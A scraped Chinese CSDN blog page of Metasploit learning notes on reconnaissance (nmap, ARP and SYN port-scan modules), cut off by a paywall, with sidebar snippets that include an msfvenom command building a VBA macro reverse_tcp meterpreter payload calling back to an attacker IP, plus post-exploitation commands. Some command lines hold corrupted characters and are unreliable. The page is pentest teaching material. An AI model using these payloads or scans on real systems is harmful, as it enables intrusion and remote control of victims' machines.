msf学习笔记（4）

最新推荐文章于 2023-07-08 17:25:54 发布

原创

最新推荐文章于 2023-07-08 17:25:54 发布 · 1.1k 阅读

6 ·

CC 4.0 BY-SA版权

文章标签：

#msf

本文详细介绍了使用MSF（Metasploit Framework）进行信息收集的过程，包括nmap的各种扫描方式如ARP、端口、IPID、UDP扫描，密码嗅探，以及SMMP、SMB、SSH和FTP的扫描和枚举。此外，还提到了针对Windows系统缺失补丁的检测以及MSSQL和FTP服务的扫描和攻击手段。

MSF信息收集

nmap扫描

db_nmap -sV 192.168.1.1

auxiliary扫描模块

RHOSTS <>RHOST
192.168.1.1-24 192.168.1.1/24
files:/root/ip.txt

arp扫描

msf > use auxiliary/scanner/discovery/arp_sweep 
set INTERFACE ̵ RHOSTS̵ SHOST̵ SMAC̵ THREADSҔ run

port扫描

use auxiliary/scanner/portscan/syn
set INTERFACE̵ PORTS̵ RHOSTS̵ THREADSҔ run

nmap ipid idle扫描

use

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

tianyazm

关注关注

0
点赞
踩
6

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

Metasploit——辅助模块(Auxiliary)

m0_62063669的博客

08-09

4151

简单网络管理协议（SNMP），由一组网络管理的标准组成，包含一个应用层协议、数据库模型和一组资源对象。/snmp/snmp_enum，如果能够获取只读（RO）或读/写（RW）权限的团体字符串，可以从中提取目标的补丁级别，运行的服务，用户名，持续运行时间，路由等信息。VNC：虚拟网络控制台，是一款优秀的远程控制工具软，基于 UNIX 和 Linux 操作系统的免费的开源软件，远程控制能力强大，高效实用。在使用之前，你需要先创建一个数据库连接用于存放扫描的数据、结果，然后加载wmap插件。...

MSF学习笔记（11）

Shadow 爬爬记

02-12

1013

本地提权漏洞检测 meterpreter > run post/multi/recon/local_exploit_suggester 迁移到指定进程 migrate -N explorer.exe 自动脚本 msf exploit(multi/handler) > set AutoRunScript migrate -n explorer.exe msf ...

参与评论您还未登录，请先登录后发表或查看评论

MSF 4.0

化繁为简：为先，为专，为强

11-11

954

The terms process model, phases and milestones have been broadly replaced in MSF 4.0 with new terminology of governance, tracks and checkpoints. A track encapsulates a set of work s

MSF 4.0 and Microsoft Team Services

化繁为简：为先，为专，为强

11-11

1877

MSF 4.0 and Microsoft Team Services http://geekswithblogs.net/cyoung/articles/63354.aspxThe forthcoming release of Visual Studio Foundation Server will include two methodology templates for the

Microsoft Solutions Framework (MSF) 4.0 相关资源

weixin_30279671的博客

08-13

256

Metasploit使用笔记[msfd模块]4

weixin_34080951的博客

11-16

681

msfd模块是用来监听本机一个端口使远程主机连接上并使用msfconsole 本地主机：msfd -a HOST -p PortNum 远程主机：nc IP Port 本文转sinojelly51CTO博客，原文链接：http://blog.51cto.com/pnig0s1992/342648，如需转载请自行联系...

msf 学习笔记（1）

Shadow 爬爬记

10-20

1409

msf数据库链接root@kali:~# msfdb reinit ##数据库重建 root@kali:~# msfdb init ##数据库链接 root@kali:~# service postgresql start ##启动pgsql数据库（5432接口未启动状态【netstat -pantu | grep 5432】） root@kali:~# msfdb start

MSF学习笔记（10）

Shadow 爬爬记

12-11

774

宏代码生成root@kali root@kali:~/Desktop# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.56.103 LPORT=5555 -e x86/shikata_ga_nai -f vba-exe 利用session 扩大战果生成后门s

掌握MSF认证：高级项目管理深度学习笔记

【描述】微软认证：高级项目管理MSF学习笔记 【标签】MSF 微软认证 ### 知识点解析 #### 微软解决方案框架（Microsoft Solutions Framework，MSF） MSF 是微软提供的一套用于指导项目和团队管理、产品开发以及...

渗透工具之msf

热门推荐

zhalang8324的博客

08-17

3万+

转载自 csdn：忆蓉之心简介它是一个免费的、可下载的框架，通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。环境工具：msf4 伪装木马原理：msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线。

Metasploit 4.0下载地址

03-09

Metasploit 4.0下载地址，window版，最新版，资源太大，无法上传，请谅解！

发现内网存活主机的各种姿势

hackzkaq的博客

04-28

1089

零基础学黑客，搜索公众号：白帽子左一在渗透中，当我们拿下一台服务器作为跳板机进一步进行内网渗透时，往往需要通过主机存活探测和端口扫描来收集内网资产。本文主要是讲nmap的扫描和基于msf的扫描发现内网存活主机，每一个点都尽量详细介绍。 1.基于UDP的扫描 UDP简介：UDP（User Datagram Protocol）是一种无连接的协议，在第四层-传输层，处于IP协议的上一层。 UDP有不提供数据包分组、组装和不能对数据包进行排序的缺点，也就是说，当报文发送之后，是无法得知其是否安全完整到达的

渗透测试工具MSF

2303_77223717的博客

07-08

1773

Metasploit Framework 简称MSF，是一款开源的安全漏洞检测工具。可以收集信息、探测系统漏洞、执行漏洞利用测试等，为渗透测试、攻击编码和漏洞研究提供了一个可靠平台，集成数千个漏洞利用、辅助测试模块。

利用密码字典暴力破解渗透目标系统

Cwillchris的博客

10-18

2729

实验名称：利用密码字典渗透目标系统实验人：XX 实验日期：2021.9.23 实验目的：利用SMB、FTP渗透windows，利用SSH渗透centos 实验环境： kali：172.16.12.30 windows靶机：172.16.12.10 用户名：administrator 密码：c!112233 centos靶机：172.16.12.11 用户名：root 密码：123 实验步骤：一、利用SMB远程登录模块渗透windows 确保windows开启允许远程连接 1、假

kali auxiliary扫描常用模块

weixin_43155143的博客

06-02

890

kali auxiliary扫描常用模块

metasploit - smb

Nixawk

08-15

1507

If you want to exploit smb locally, you need to modify regedit settings and reboot your computer.Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Polici

MSF 内网渗透（案例）

3569

06-03

2万+

0x00 前言虽然渗透，但是不常使用msf进行内网渗透，这篇刚好的弥补了 win 和 linux shell 和 msf 的对接的流程。原文： https://mp.weixin.qq.com/s/sKXWjgaViYsCjG33-5Ey8Q0x01 案例分析实验环境：目标环境：10.0.0.0/24, 10.0.1.0/24攻击主机：10.0.0.5 (Kali), 10.0.0.7 (Win...

metasploit基础使用

eenki的博客

02-11

2214

msf数据库创建和配置，msf渗透android手机，metasploit基础操作及原理解释等干货